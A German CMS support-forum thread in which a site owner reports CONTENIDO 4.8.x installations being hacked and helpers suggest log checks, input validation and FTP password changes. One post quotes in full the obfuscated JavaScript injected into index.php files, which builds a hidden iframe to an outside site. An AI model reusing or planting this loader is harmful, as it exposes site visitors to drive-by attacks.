Contenido 4.8.xx Angriff - gehackt
-
- Beiträge: 251
- Registriert: Do 10. Mär 2011, 17:02
- Wohnort: Erlangen
- Kontaktdaten:
Contenido 4.8.xx Angriff - gehackt
Hallo,
heute wurden mehrere Accounts meiner Contenido Installationen bei 1und1gehackt. Versionen 4.8.xx
Ich weis nicht ob das woanders auch passiert.
Im Verzeichnis contenido wurden die beiden Dateien mail.php und index.php überschreiben (trotz Schreibschutz)
Einfach die beiden Dateien wieder herstellen und dann funktioniert es wieder.
Gruß sarronsarron
heute wurden mehrere Accounts meiner Contenido Installationen bei 1und1gehackt. Versionen 4.8.xx
Ich weis nicht ob das woanders auch passiert.
Im Verzeichnis contenido wurden die beiden Dateien mail.php und index.php überschreiben (trotz Schreibschutz)
Einfach die beiden Dateien wieder herstellen und dann funktioniert es wieder.
Gruß sarronsarron
-
- Beiträge: 251
- Registriert: Do 10. Mär 2011, 17:02
- Wohnort: Erlangen
- Kontaktdaten:
Re: Contenido 4.8.xx Angriff - gehackt
Anscheinend wurde 4.8.14 und 4.8.15 gehackt.
Bei 1und1 und bei Strato.
Gruß sarronsarron
Bei 1und1 und bei Strato.
Gruß sarronsarron
Re: Contenido 4.8.xx Angriff - gehackt
Kannst du mir bitte per PM die Apache Logs von dem Zeitraum zukommen lassen, in der der Hack maßgeblich stattgefunden hat?
Und natürlich auch die CONTENIDO Version, sowie Details über PHP, Apache, Betriebssystem?
Danke und Grüße
xmurrix
Und natürlich auch die CONTENIDO Version, sowie Details über PHP, Apache, Betriebssystem?
Danke und Grüße
xmurrix
CONTENIDO Downloads: CONTENIDO 4.10.1
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
-
- Beiträge: 3626
- Registriert: Di 12. Okt 2004, 20:00
- Wohnort: Voerde (Niederrhein)
- Kontaktdaten:
Re: Contenido 4.8.xx Angriff - gehackt
So, ich habe das mal verschoben, das sollte hier besser passen.
-
- Beiträge: 472
- Registriert: Di 15. Apr 2008, 15:57
- Wohnort: Michelstadt
- Kontaktdaten:
Re: Contenido 4.8.xx Angriff - gehackt
Diese Info hätte ich auch gerne per PM. Herzlichen Dank!
Re: Contenido 4.8.xx Angriff - gehackt
Danke nochmals für das Senden der Logs per PM, bis jetzt scheint es kein CONTENIDO Problem zu sein.
Bitte prüfe auch andere Scripte, sofern du welche hast und auch die verwendete PHP-Version.
Idealerweise sollte auch nicht die verwendete Version der Anwendungen (PHP, Apache, usw.) öffentlich gemacht werden, da man über die Versionsnummer sehr leicht die Schwachstellen preis gibt. In Apache und PHP kann man das Senden dieser Details unterbinden.
Gruß
xmurrix
Bitte prüfe auch andere Scripte, sofern du welche hast und auch die verwendete PHP-Version.
Idealerweise sollte auch nicht die verwendete Version der Anwendungen (PHP, Apache, usw.) öffentlich gemacht werden, da man über die Versionsnummer sehr leicht die Schwachstellen preis gibt. In Apache und PHP kann man das Senden dieser Details unterbinden.
Gruß
xmurrix
CONTENIDO Downloads: CONTENIDO 4.10.1
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
-
- Beiträge: 251
- Registriert: Do 10. Mär 2011, 17:02
- Wohnort: Erlangen
- Kontaktdaten:
Re: Contenido 4.8.xx Angriff - gehackt
Bei mir sind alle Contenido Versionen betroffen.
In contenido/main.php und index.php wurde folgender Code an den Anfang kopiert.
<script>try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(zxc){for(i=0;i-646!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n,12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}}</script><?php
Gruß sarronsarron
In contenido/main.php und index.php wurde folgender Code an den Anfang kopiert.
<script>try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(zxc){for(i=0;i-646!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n,12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}}</script><?php
Gruß sarronsarron
-
- Beiträge: 251
- Registriert: Do 10. Mär 2011, 17:02
- Wohnort: Erlangen
- Kontaktdaten:
Re: Contenido 4.8.xx Angriff - gehackt
Hallo xmurrix,
shit, du hast Recht, es sind noch andere Dateien betroffen.
So wie es aussieht sind alle index.php Dateien betroffen aus CMS und Contenido.
CMS und Contenido läuft aber trotzdem.
Gruß sarronsarron
shit, du hast Recht, es sind noch andere Dateien betroffen.
So wie es aussieht sind alle index.php Dateien betroffen aus CMS und Contenido.
CMS und Contenido läuft aber trotzdem.
Gruß sarronsarron
Re: Contenido 4.8.xx Angriff - gehackt
Suche bitte in der Apache Log nach Einträgen, die eventuell diesen Code enthalten.sarronsarron hat geschrieben:...In contenido/main.php und index.php wurde folgender Code an den Anfang kopiert...
Prüfe auch Formularmodule, die per POST eingaben annehmen und/odr E-Mails versenden. Wenn man ankommende Daten nicht prüft, könnten diese schon Probleme verursachen. Aber wenn die contenido/main.php und die contenido/index.php geändert wurden, so hat das vermutlich nicht über die Webseite stattgefunden. PHP wird mit dem Account des Webservers gestartet, und alles was PHP macht, läuft mit dem Account des Webservers und dieser hat normalerweise keine Rechte, um diese PHP Scripte zu ändern.
CONTENIDO Downloads: CONTENIDO 4.10.1
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
-
- Beiträge: 251
- Registriert: Do 10. Mär 2011, 17:02
- Wohnort: Erlangen
- Kontaktdaten:
Re: Contenido 4.8.xx Angriff - gehackt
Hi,
den Eintrag habich in der Log Datei vom 24.1.13 nicht gefunden.
Post Variablen funktionieren
Gruß sarronsarron
den Eintrag habich in der Log Datei vom 24.1.13 nicht gefunden.
Post Variablen funktionieren
Gruß sarronsarron
Re: Contenido 4.8.xx Angriff - gehackt
Ok, die Scripte wurden auch am 24.01.13 geändert?sarronsarron hat geschrieben:...den Eintrag habich in der Log Datei vom 24.1.13 nicht gefunden...
Falls ja, dann schau mal nach POST Requests in der Log-Datei, und Prüfe die Module der Seiten, an die der Post Request gegangen ist.
Meinst du damit, dass sie ankommen? Falls so, dann meinte ich das damit nicht, sondern eher das Prüfen dieser Werte auf ihre Inhalte, ich meine dass eine E-Mail Adresse auch wirklich eine E-Mail Adresse ist und dass Text auch nur Text enthält und kein Code, das am Ende irgendwie ausgeführt werden kann.sarronsarron hat geschrieben:...Post Variablen funktionieren...
Bitte nicht falsch verstehn, ich versuche das Thema aus verschiedenen Punkten anzugehen, die Lücke kann überall sein, CONTENIDO, Module, Betriebssystem, PHP, Apache, usw...
CONTENIDO Downloads: CONTENIDO 4.10.1
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
Re: Contenido 4.8.xx Angriff - gehackt
Bei ein derartiges Problem würde ich als erstes mal sämtliche FTP-Kennwörter ändern und auf dem eigenen PC (und alle wo diese FTP-Zugänge genutzt werden) einen intensiven Viren- und Trojanerscan starten, denn oft wird über ein Trojaner die FTP-Zugangsdaten abgegriffen und dann für solche Änderungen genutzt.
Hinweise für solche FTP-Änderungen sucht man oft vergeblich, aber nach dem Ändern der Passwörter ist der Spuk meistens vorbei.
Gruß
René
Hinweise für solche FTP-Änderungen sucht man oft vergeblich, aber nach dem Ändern der Passwörter ist der Spuk meistens vorbei.
Gruß
René
Re: Contenido 4.8.xx Angriff - gehackt
Gibt es schon Neuigkeiten in dieser Sache?
Der Hinweis mit den FTP-Kennwörtern ist auch wichtig, man kann in den FTP-Logs sehen, ob da ein Zugriff (außer dem eigenen) auf den Server stattgefunden hat oder nicht...
Der Hinweis mit den FTP-Kennwörtern ist auch wichtig, man kann in den FTP-Logs sehen, ob da ein Zugriff (außer dem eigenen) auf den Server stattgefunden hat oder nicht...
CONTENIDO Downloads: CONTENIDO 4.10.1
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
-
- Beiträge: 251
- Registriert: Do 10. Mär 2011, 17:02
- Wohnort: Erlangen
- Kontaktdaten:
Re: Contenido 4.8.xx Angriff - gehackt
Hi,
hab noch nix mit den Log Files gemacht musste schaun das ich heute alle Projekte wieder auf eine vernünftigen Stand bringe uns alle FTP Passworter ändere.
Werd mich morgen darum kümmern.
Gruß sarronsarron
hab noch nix mit den Log Files gemacht musste schaun das ich heute alle Projekte wieder auf eine vernünftigen Stand bringe uns alle FTP Passworter ändere.
Werd mich morgen darum kümmern.
Gruß sarronsarron
Re: Contenido 4.8.xx Angriff - gehackt
Viel Erfolg dabei!
CONTENIDO Downloads: CONTENIDO 4.10.1
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.
CONTENIDO Links: Dokumentationsportal, FAQ, API-Dokumentation
CONTENIDO @ Github: CONTENIDO 4.10 - Mit einem Entwicklungszweig (develop-branch), das viele Verbesserungen/Optimierungen erhalten hat und auf Stabilität und Kompatibilität mit PHP 8.0 bis 8.2 getrimmt wurde.